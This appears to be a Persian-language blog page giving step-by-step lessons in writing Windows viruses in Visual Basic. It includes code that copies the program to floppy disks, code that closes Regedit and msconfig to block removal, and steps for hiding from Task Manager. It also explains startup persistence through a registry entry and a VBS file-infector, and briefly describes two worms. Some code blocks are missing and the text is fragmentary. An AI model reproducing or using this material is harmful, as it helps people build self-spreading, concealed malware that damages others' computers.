| برنامه های قابل حمل | آرشیو وبلاگ | پست الکترونیک |
صفحه اصلي |
|
كرم W32/Bermado : %UserProfile%\SendTo\Svchost کار دیگر این کرم ایجاد یک کرم دیگر از همین گونه با نام W32/Bermado.b است که حجم آن 4076 است %UserProfile%\SendTo\SOUNDMAX این ورم برای اجرای خود در هر بار راه اندازی کلید زیر را ایجاد می کند : HKEY_CURRENT_USER\Software این ورم با استفاده از کلید های زیر اجازه نمایش فایل های مخفی می گیرد ، HKLM\SOFTWARE\Microsoft برای بر طرف سازی اثرات تخريبی اين کرم می توانيد از برنامه ی زير استفاده کنيد آیکون این ورم شبیه فولدر است ممکن است توسط کاربر اجرا شود با وارد شدن به هر پوشه ای آن پوشه را مخفی می کند
یکی از راه های قدیمی ولی پرکاربرد ویروس ها برای منتشر شدن،فلاپی است.اگر ویروستان به کافی نت یا دیگر کامپیوتر های عمومی راه یافت و این قابلیت را داشت،می تواند به راحتی منتشر شود.کدهای زیر را در یک timer کپی کنید:
On Error GoTo h Set fso = CreateObject("Scripting.FileSystemObject") mf = App.Path & "\" & App.EXEName & ".exe" If Dir("A:\" & "virus.exe") = "" Then FileCopy mf, "A:\" & "virus.exe" End If h:
توضیح کدها: در خط اول می گوید که اگر برنامه error پیدا کرد،آن را به خط آخر منتقل کند.خط دوم هم که می دانید.در خط سوم،ویروس مسیر فایل خودش را می گیرد که برای کپی کردن خودش درون فلاپی نیاز است.در خط چهارم می گوید که اگر در فلاپی فایلی به نام virus.exe وجود ندارد،خودش را با نام virus.exe در فلاپی کپی کند. اين ويروس يک نمونه از ويروس هاي vbs است که فايل هاي vbs و vbe کامپيوتر را آلوده مي کند و ساختاري بسيار ساده دارد ولي در بعضي موارد مي تواند بسيار خطرناک باشد. ساخت ويروس: براي ساخت ويروس کدهاي زير را در notepad ويندوز کپي کنيد.سپس از منوي فايل گزينه ي save as را انتخاب کنيد و در کادر filename نام دلخواهتان را وارد کنيد ولي بعد از نام حتما" بنويسيد: .vbs يا .vbe
Biosan.vbs يا Biosan.vbe
توضیح ویروس خط اول و دوم رو تو پستای قبل گفتم.در خط سوم و چهارم،ویروس خودشو به صورت یک فایل متنی باز می کند و کدهای خودش را می خواند و در حافظه نگه می دارد(این کار برای آلوده کردن فایل ها نیاز است)در خط پنج تا ده،ویروس هارد دیسک و دیگر دیسک ها را می گردد و اگر دیسکی برای آلوده کردن فایل ها آماده بود،برنامه را به خط نه تا مونده به آخر منتقل می کند.از این خط تا آخر برنامه،ویروس فولدرهای درون دیسک را می گردد و اگر فایلی را پیدا کرد که برای آلوده شدن آماده است،برنامه را به خط پانزدهم منتقل می کند.این خط تا خط نه تا مونده به آخر،فایل پیدا شده را چک می کند.اگر پسوند فایل ویژوال بیسک اسکریپت باشد،فایل را باز کرده،سپس کدهایی را که در حافظه قرار داده بود،درون آن فایل قرار می دهد و به طور کلی آن فایل را آلوده می کند.سپس همین چرخه ادامه پیدا می کند تا تمام فایل های ویژوال بیسیک اسکریپت آلوده شوند. اين کدها باعث مي شود از کارت صداي کامپيوتر صداي beep بيايد.ابتدا اين کدها را در قسمتgeneral کپي کنيد:
يک تايمر درست کنيد و اين کد ها را درونش بنويسيد. t = GetTickCount& \ 60000 If t >= 10 Then Beep 135, 3304
در
اين پست به شما ياد ميدم که چه طور هر نوع اتصال انترنت رو قطع کنيد.فقط
کافيه يه timer با interval مناسب درست کنيد و درونش کد زير رو کپی
کنيد.
یکی از راه های غیر فعال کردن ویروس ها،regedit و msconfig می باشد.با این دو برنامه ای که در ویندوز وجود دارد،می توان کاری کرد که ویروس،در هر بار اجرای ویندوز،اجرا نشود.در run عبارت regedit یا msconfig را تایپ کنید تا این برنامه اجرا شوند.
برای غیرفعال کردن این دو برنامه کارهای زیر را انجام دهید:
ابتدا کدهای زیر را در قسمت general کپی کنید:
Private Declare Function SendMessage Lib "user32.dll" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
حالا این کدها را در یک timer کپی کنید:
Dim reghwnd As Long Dim syshwnd As Long Const WM_CLOSE = &H10 syshwnd = FindWindow(vbNullString, "System Configuration Utility") reghwnd = FindWindow("RegEdit_RegEdit", vbNullString)
If syshwnd <> 0 Then SendMessage syshwnd, WM_CLOSE, 0&, 0& If reghwnd <> 0 Then SendMessage reghwnd, WM_CLOSE, 0&, 0&
در پست قبلی شاید اصلی ترین چیز رو در ویروس نویسی یاد گرفتیم.حال قسمت دوم آموزش رو می خوایم بدیم که اون مخفی کردن ویروسه.مخفی کردن form و مخفی کردن ویروس رو در لیست task های taskmanager یاد گرفتید.حالا می خوایم مخفی کردن ویروس رو در لیست process های taskmanager،آموزش بدیم.هر ویروسی قادر به این کار نیست و فقط ویروس های جدید می تونن این کارو انجام بدن.برای این کار باید ابتدا vb رو اجرا و بعد standard exe رو انتخاب کنیم و سه مرحله کار انجام بدیم: مرحله ی اول: اول این کدها رو در قسمت general کپی کنید مرحله ی دوم: حالا این کدها رو جدا از قسمت form_load و general کپی کنید که خودش یک قسمت باشه:
مرحله ی سوم: حال یک timer با interval مناسب(مثلا" 1) درست کنید و کد زیر رو در timer قرار بدید: Hide_Process CStr(App.EXEName & ".exe")
در این جا باید بگم که منظور از app.exename،نام فایلی ویروس است و اگر نام فایلتان را مثلا" h بذاری،app.exename هم h می شود.حال ما ویروسی رو داریم که در لیست process های taskmanager مخفی است و از حالت اجرا درآوردن ویروس رو بسیار بسیار سخت میکنه.در پست های بعد غیرقابل حذف شدن ویروس رو آموزش میدم.
یک ویروس برای اینکه بتونه کارهای مخربش رو انجام بده،باید هر لحظه اجرا باشه.یعنی از زمانی که ویندوز بار گزاری میشه تا وقتی که از ویندوز خارج می شویم.هر ویروسی باید خونه ای داشته باشه و تو اونجا زندگی کنه و خونه اش جایی باشه که نه کاربر به اون دسترسی داشته باشه و نه حذف بشه.پس بهترین جا،پوشه ی ویندوز است که بعضی ها از رفتن به آن خودداری می کنند زیرا می ترسن ویندوزشون خراب بشه.خوب،کار بعدی اینه که ویروس،هر بار ویندوز اجرا شد،اجرا بشه که این کمک می کنه تا ویروس،هر کاری بخواد بکنه.اول Visual Basic رو اجرا کنید و بعد standard exe و بعد هم در قسمت form_load کدهای زیر رو بنویسید. اگه از کدهای vb سردر نمیارید براتون توضیح میدم. در خط اول کدی را وارد کردیم که باعث می شود form برنامه،در حین اجرا مخفی باشد و خط دوم باعث می شود تا برنامه،در لیست task های taskmanager مخفی باشد.در پست های بعد،آموزش مخفی کردن ویروس در لیست process های taskmanager رو می دم.در خط سوم،ما شئی fso رو برای دسترسی به فایل ها،فولدرهاو ...به برنامه معرفی کردیم.اگه این کارو نکنیم از قابلیت های این شئی برخوردار نمی شویم.در خط چهارم،از متد getspecialfolder برای بدست آوردن پوشه های حساس ویندوز استفاده می کنیم.اگه به جای صفر،یک بذاریم پوشه ی system 32 را به ما می دهد و اگر 2 بذاریم،پوشه ی temp ویندوز رو میده.در خط پنجم،مسیر فایل خودمون رو بدست آوردیم و اگه این کارو نکنیم،نمی تونیم فایل یا ویروسمون رو کپی کنیم.در خط ششم فایل را کپی کرده و در خط هفتم مسیر فایل کپی شده را به برنامه می دهیم چون برای گذاشتن مسیر فایل در ریجیستری به آن نیاز مندیم و در خط بعدی،شیئی را به برنامه معرفی کرده ایم که باعث می شود بتوانیم به ریجیستری دسترسی داشته یاشیم و در خط آخر هم،مسیر فایل کپی شده را در قسمتی خاص در ریجیستری می گذاریم.ریجیستری مکانی است که حیات ویندوز به آن وابسته است و کارهای اصلی ویندوز به وسیله ی آن صورت می گیرد و برای دسترسی به ریجیستری در run عبارت regedit رو تایپ کنید. امیدوارم از این مطالب،لذت برده باشید.
سلام به دوستان عزیزم که این ویلاگ رو مشاهده می کنند ولی نظر نمیدن .....
كرم W32/Foova.ai : C:\ChamranPartC.exe از کارهایی که ورم W32/Foova.ai بر روی سیستم انجام می دهد درون فایل زیر گزارشی از تکثیر این ورم تهیه می کند %Temp%\Help-X27.txt پیامی به شکل زیر نمایش می دهد
بر روی صفحه نمایش صفحهای شبیه به شکل زیر نمایش می دهد
برای اجرای خود در هر بار راه اندازی کلید زیر را ایجاد می کند HKLM\SOFTWARE\Microsoft با تبلیغ سایت http://www.persiancod.com لینک های فریبنده زیر را نمایش می دهد Fun - Sex And Love In This Pack |